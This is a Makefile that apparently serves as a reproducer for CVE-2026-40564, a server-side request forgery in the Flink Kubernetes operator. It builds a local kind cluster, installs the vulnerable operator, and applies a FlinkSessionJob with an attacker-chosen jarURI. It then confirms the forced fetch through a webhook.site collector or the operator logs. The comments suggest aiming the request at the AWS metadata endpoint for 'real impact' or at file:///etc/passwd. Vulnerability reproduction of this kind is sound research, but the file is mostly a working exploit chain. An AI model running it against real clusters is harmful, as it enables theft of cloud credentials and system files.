# Run every recipe under bash in strict mode: -e aborts on the first failing
# command, -u treats unset shell variables as errors, and pipefail makes a
# pipeline fail when any stage fails (not only the last one).
SHELL := /usr/bin/env bash
.SHELLFLAGS := -eu -o pipefail -c

# User-tunable knobs. Each uses ?= so a value supplied on the command line or
# in the environment wins over the default written here.
# Name of the kind cluster; the kubectl context used for it is kind-<name>.
KIND_CLUSTER_NAME ?= cve-2026-40564
# Passed to helm as --version and embedded in HELM_REPO_URL below.
OPERATOR_VERSION  ?= 1.14.0
# Namespace used for the operator install and for every kubectl -n call.
NAMESPACE         ?= default
# Generous default so a slow ghcr.io image pull does not fail the install.
HELM_TIMEOUT      ?= 10m
# Helm repository URL. It is version-specific: := expands OPERATOR_VERSION
# once, when this line is parsed.
HELM_REPO_URL     := https://downloads.apache.org/flink/flink-kubernetes-operator-$(OPERATOR_VERSION)/

# SSRF_URL is the full jarURI the operator is coerced into fetching, used verbatim.
# Leave it empty and a fresh webhook.site URL is allocated for you.
# Examples:
#   make verify SSRF_URL=https://webhook.site/<uuid>/exploit.jar   # reuse a webhook.site URL
#   make verify SSRF_URL=https://my.interactsh.example/x.jar       # Burp/interactsh collaborator
#   make verify SSRF_URL=http://169.254.169.254/latest/meta-data/  # AWS IMDS (real impact)
#   make verify SSRF_URL=file:///etc/passwd                        # non-HTTP scheme
# WEBHOOK_URL is accepted as an alias for SSRF_URL.
# verify-ssrf auto-detects the target: webhook.site URLs are confirmed via its API;
# any other target is confirmed from the operator's own logs.
# Both default to empty; trigger-ssrf allocates a webhook.site URL when the
# effective target below is empty.
SSRF_URL    ?=
WEBHOOK_URL ?=
# Effective target: the or function yields its first non-empty argument, so
# SSRF_URL takes precedence over WEBHOOK_URL when both are set.
TARGET_URL  := $(or $(SSRF_URL),$(WEBHOOK_URL))

# Every target in this file is a command, not a file to build; declaring them
# phony keeps a stray file named e.g. "cleanup" from masking the recipe.
.PHONY: help verify cluster-up install-operator session-cluster trigger-ssrf verify-ssrf cleanup

# help: print the target and variable reference.
# It is the first target in this file and no .DEFAULT_GOAL is set, so a bare
# `make` prints this text; `verify` has to be requested explicitly.
# The %s arguments are single-quoted so an overridden value containing spaces
# or shell metacharacters is printed verbatim instead of being word-split.
help:
	@printf 'CVE-2026-40564 Reproducer\n\n'
	@printf 'Quick start:  make verify\n\n'
	@printf 'Targets:\n'
	@printf '  help                Show this message\n'
	@printf '  verify              Full end-to-end run of the five steps below\n'
	@printf '  cluster-up          Create kind cluster + patch CoreDNS\n'
	@printf '  install-operator    Helm-install operator + patch its dnsConfig\n'
	@printf '  session-cluster     Apply the Flink session cluster, wait for JM READY\n'
	@printf '  trigger-ssrf        Apply the malicious CR (target: SSRF_URL, or a fresh webhook.site URL)\n'
	@printf '  verify-ssrf         Confirm the fetch via the webhook.site API or the operator logs\n'
	@printf '  cleanup             Delete the kind cluster\n\n'
	@printf 'Variables:\n'
	@printf '  SSRF_URL=...        Full jarURI to coerce the operator into fetching\n'
	@printf '                      (any URL/scheme; default: auto-allocated webhook.site)\n'
	@printf '  WEBHOOK_URL=...     Alias for SSRF_URL (SSRF_URL wins when both are set)\n'
	@printf '  KIND_CLUSTER_NAME   Cluster name (default: %s)\n' '$(KIND_CLUSTER_NAME)'
	@printf '  OPERATOR_VERSION    Operator chart/image version (default: %s)\n' '$(OPERATOR_VERSION)'
	@printf '  NAMESPACE           Namespace for the operator and the CRs (default: %s)\n' '$(NAMESPACE)'
	@printf '  HELM_TIMEOUT        Timeout for the helm install (default: %s)\n' '$(HELM_TIMEOUT)'

# verify: run the whole reproduction, steps 1/5 through 5/5.
# The steps must run strictly in the order listed, yet none of them declares
# the previous step as a prerequisite, so that order only holds while make
# runs serially. .NOTPARALLEL keeps it serial even when -j is passed (or is
# inherited through MAKEFLAGS).
.NOTPARALLEL:

verify: cluster-up install-operator session-cluster trigger-ssrf verify-ssrf

# ---------- 1/5 ----------
# cluster-up: ensure the kind cluster exists and that its CoreDNS forwards to
# public resolvers. An already existing cluster is reused.
# Every kubectl call here is pinned to the kind-<name> context. `kind create
# cluster` is not run when the cluster already exists, so the current
# kubeconfig context may point at an unrelated cluster in that case; without
# the pin the CoreDNS patch and restart would be applied there.
# NOTE(review): the later targets still use the current kubectl/helm context.
cluster-up:
	@echo "==> [1/5] cluster-up"
	@# grep reads its whole input here (no -q early exit), so the producer is never
	@# killed by a closed pipe, which pipefail would report as "no match".
	@if kind get clusters | grep -Fx -- '$(KIND_CLUSTER_NAME)' >/dev/null; then \
	  echo "kind cluster '$(KIND_CLUSTER_NAME)' already exists"; \
	else \
	  kind create cluster --name $(KIND_CLUSTER_NAME); \
	fi
	@kubectl --context kind-$(KIND_CLUSTER_NAME) cluster-info >/dev/null
	@# kind on Linux + systemd-resolved makes CoreDNS forward to 127.0.0.1, so fix it.
	@if kubectl --context kind-$(KIND_CLUSTER_NAME) -n kube-system get configmap coredns -o yaml \
	    | grep "forward \. /etc/resolv.conf" >/dev/null; then \
	  echo "    patching CoreDNS to forward to 1.1.1.1 / 8.8.8.8..."; \
	  kubectl --context kind-$(KIND_CLUSTER_NAME) -n kube-system get configmap coredns -o yaml \
	    | sed 's|forward \. /etc/resolv.conf|forward . 1.1.1.1 8.8.8.8|' \
	    | kubectl --context kind-$(KIND_CLUSTER_NAME) apply -f - >/dev/null; \
	  kubectl --context kind-$(KIND_CLUSTER_NAME) -n kube-system rollout restart deployment coredns >/dev/null; \
	  kubectl --context kind-$(KIND_CLUSTER_NAME) -n kube-system rollout status deployment coredns --timeout=120s >/dev/null; \
	fi

# ---------- 2/5 ----------
# install-operator: install (or upgrade) the operator chart at OPERATOR_VERSION
# into NAMESPACE with its webhook disabled, then replace the operator pod's DNS
# settings and wait for the resulting rollout.
install-operator:
	@echo "==> [2/5] install-operator"
	@# The repo URL embeds OPERATOR_VERSION, so an existing "flink-operator" entry may
	@# still point at another version. --force-update overwrites it; a plain "repo add"
	@# fails in that case, and ignoring the failure left the stale repo in use.
	@helm repo add --force-update flink-operator $(HELM_REPO_URL) >/dev/null
	@helm repo update flink-operator >/dev/null
	@helm upgrade --install flink-kubernetes-operator flink-operator/flink-kubernetes-operator \
	  --version $(OPERATOR_VERSION) \
	  --namespace $(NAMESPACE) \
	  --set webhook.create=false \
	  --wait --timeout $(HELM_TIMEOUT) >/dev/null
	@# Strip the host's DNS search domains from the operator pod.
	@# NOTE(review): 10.96.0.10 is presumably the cluster DNS Service IP; confirm it
	@# if the cluster uses a non-default service CIDR.
	@kubectl -n $(NAMESPACE) patch deployment flink-kubernetes-operator --type=strategic -p \
	  '{"spec":{"template":{"spec":{"dnsPolicy":"None","dnsConfig":{"nameservers":["10.96.0.10"],"searches":["$(NAMESPACE).svc.cluster.local","svc.cluster.local","cluster.local"],"options":[{"name":"ndots","value":"5"}]}}}}}' >/dev/null
	@kubectl -n $(NAMESPACE) rollout status deployment/flink-kubernetes-operator --timeout=120s

# ---------- 3/5 ----------
# session-cluster: apply manifests/session-cluster.yaml in NAMESPACE, then block
# (for at most 10 minutes) until the FlinkDeployment named session-cluster
# reports status.jobManagerDeploymentStatus == READY.
session-cluster:
	@echo "==> [3/5] session-cluster"
	@kubectl apply --namespace $(NAMESPACE) --filename manifests/session-cluster.yaml >/dev/null
	@echo "    waiting for JM READY (first run pulls flink:1.17, can take ~5 min)..."
	@kubectl wait flinkdeployment/session-cluster \
	  --namespace $(NAMESPACE) \
	  --timeout=10m \
	  --for=jsonpath='{.status.jobManagerDeploymentStatus}'=READY

# ---------- 4/5 ----------
# trigger-ssrf: pick the SSRF target and apply the FlinkSessionJob pointing at it.
#   - TARGET_URL non-empty: used verbatim as the jarURI.
#   - TARGET_URL empty: a token is requested from webhook.site (needs curl, jq
#     and network access) and https://webhook.site/<token>/exploit.jar is used.
# The jarURI line of manifests/vulnerable-sessionjob.yaml is rewritten with sed
# and the result is piped to kubectl apply. The URL is escaped first because
# sed gives three characters a special meaning in a replacement: "&" expands to
# the matched text, "|" is the delimiter used here, and a backslash starts an
# escape. Without escaping, a target with a query string such as ?a=1&b=2
# would be silently corrupted.
# Exits 1 when no webhook.site token can be allocated.
trigger-ssrf:
	@echo "==> [4/5] trigger-ssrf"
	@if [ -n "$(TARGET_URL)" ]; then \
	  URL="$(TARGET_URL)"; \
	  echo "    using configured target"; \
	else \
	  echo "    allocating a fresh webhook.site token..."; \
	  TOKEN=$$(curl -sf -X POST -H "Accept: application/json" "https://webhook.site/token" 2>/dev/null | jq -r '.uuid' 2>/dev/null || true); \
	  if [ -z "$$TOKEN" ] || [ "$$TOKEN" = "null" ]; then \
	    echo "FAIL: could not allocate a webhook.site token (no network, or jq missing)."; \
	    echo "Provide a target explicitly:  make trigger-ssrf SSRF_URL=https://webhook.site/<uuid>/exploit.jar"; \
	    exit 1; \
	  fi; \
	  URL="https://webhook.site/$$TOKEN/exploit.jar"; \
	fi; \
	echo; \
	echo "    SSRF target : $$URL"; \
	UUID=$$(printf '%s' "$$URL" | grep -oE 'webhook\.site/[a-f0-9-]{36}' | cut -d/ -f2 || true); \
	if [ -n "$$UUID" ]; then echo "    Dashboard   : https://webhook.site/#!/view/$$UUID"; fi; \
	echo; \
	ESCAPED_URL=$$(printf '%s' "$$URL" | sed -e 's/[\\&|]/\\&/g'); \
	sed "s|jarURI: .*|jarURI: $$ESCAPED_URL|" manifests/vulnerable-sessionjob.yaml \
	  | kubectl -n $(NAMESPACE) apply -f - >/dev/null
	@echo "    FlinkSessionJob applied."

# ---------- 5/5 ----------
# verify-ssrf: confirm that the operator acted on the jarURI of the applied
# FlinkSessionJob (cve-2026-40564-ssrf-demo). Exits 0 on confirmation, 1 otherwise.
#   - jarURI contains webhook.site/<36-char uuid>: the requests already stored
#     for that token are deleted, then the webhook.site API is polled (90
#     attempts, 2 s apart) until a captured request shows up.
#     NOTE(review): the delete can also discard a request that arrived between
#     trigger-ssrf and this step; this presumably relies on the operator
#     retrying the fetch. Confirm.
#   - any other jarURI: the operator logs are polled on the same schedule for
#     "HttpArtifactFetcher".
#     NOTE(review): log lines left over from an earlier run would also match.
# On timeout the job's status.error is printed to help diagnosis.
#
# Strict-mode details that matter here (recipes run with -eu -o pipefail):
#   - the kubectl lookup ends in "|| true"; otherwise a missing job aborts the
#     shell under -e before the explanatory FAIL message is printed;
#   - matches are done with [[ ]] or a here-string rather than "producer |
#     grep -q": grep -q exits at the first match, a producer with more output
#     than the pipe buffer holds is then killed by SIGPIPE, and pipefail turns
#     the successful match into a failure;
#   - the raw-JSON fallback tolerates head closing the pipe early.
verify-ssrf:
	@echo "==> [5/5] verify-ssrf"
	@JARURI=$$(kubectl -n $(NAMESPACE) get flinksessionjob cve-2026-40564-ssrf-demo -o jsonpath='{.spec.job.jarURI}' 2>/dev/null || true); \
	if [ -z "$$JARURI" ]; then \
	  echo "FAIL: no cve-2026-40564-ssrf-demo FlinkSessionJob found in namespace $(NAMESPACE)."; \
	  echo "Run 'make trigger-ssrf' first."; \
	  exit 1; \
	fi; \
	echo "    target jarURI: $$JARURI"; \
	UUID=$$(printf '%s' "$$JARURI" | grep -oE 'webhook\.site/[a-f0-9-]{36}' | cut -d/ -f2 || true); \
	if [ -n "$$UUID" ]; then \
	  echo "    target is webhook.site, confirming via its REST API..."; \
	  curl -sf --max-time 5 -X DELETE "https://webhook.site/token/$$UUID/request" >/dev/null 2>&1 || true; \
	  for i in $$(seq 1 90); do \
	    RESP=$$(curl -sf --max-time 5 "https://webhook.site/token/$$UUID/requests?sorting=newest" 2>/dev/null || true); \
	    if [[ "$$RESP" == *'"method"'* ]]; then \
	      echo; echo "    === webhook.site captured requests (newest first) ==="; \
	      if command -v jq >/dev/null 2>&1; then \
	        printf '%s' "$$RESP" | jq -r '.data[:5][] | "      \(.created_at)  \(.method) \(.url)\n        User-Agent: \(.user_agent)\n        Source IP:  \(.ip)"'; \
	      else \
	        echo "    (install jq for pretty output; raw JSON below)"; printf '%s\n' "$$RESP" | head -c 1500 || true; echo; \
	      fi; \
	      echo; echo "    CVE-2026-40564 CONFIRMED: the operator pod issued an HTTP GET against the attacker URL."; \
	      echo "    Dashboard: https://webhook.site/#!/view/$$UUID"; \
	      exit 0; \
	    fi; \
	    sleep 2; \
	  done; \
	  echo "FAIL: no requests captured within the timeout."; \
	else \
	  echo "    custom target, confirming from the operator's own logs..."; \
	  for i in $$(seq 1 90); do \
	    LOGS=$$(kubectl -n $(NAMESPACE) logs deployment/flink-kubernetes-operator 2>/dev/null || true); \
	    if grep -q "HttpArtifactFetcher" <<<"$$LOGS"; then \
	      echo; echo "    === operator stack frames (proof the fetch ran) ==="; \
	      grep -E "HttpArtifactFetcher|ArtifactManager\.fetch|uploadJar|submitJobToSessionCluster" <<<"$$LOGS" | head -10 || true; \
	      echo; echo "    CVE-2026-40564 CONFIRMED: the operator entered HttpArtifactFetcher.fetch with the attacker-supplied jarURI."; \
	      echo "    (Whether the connection completed depends on the target; the SSRF is the operator issuing the request.)"; \
	      exit 0; \
	    fi; \
	    sleep 2; \
	  done; \
	  echo "FAIL: no HttpArtifactFetcher activity in the operator logs within the timeout."; \
	fi; \
	echo "FlinkSessionJob status.error:"; \
	kubectl -n $(NAMESPACE) get flinksessionjob cve-2026-40564-ssrf-demo -o jsonpath='{.status.error}{"\n"}' || true; \
	exit 1

# cleanup: tear down the kind cluster named by KIND_CLUSTER_NAME.
cleanup:
	@kind delete cluster --name=$(KIND_CLUSTER_NAME)
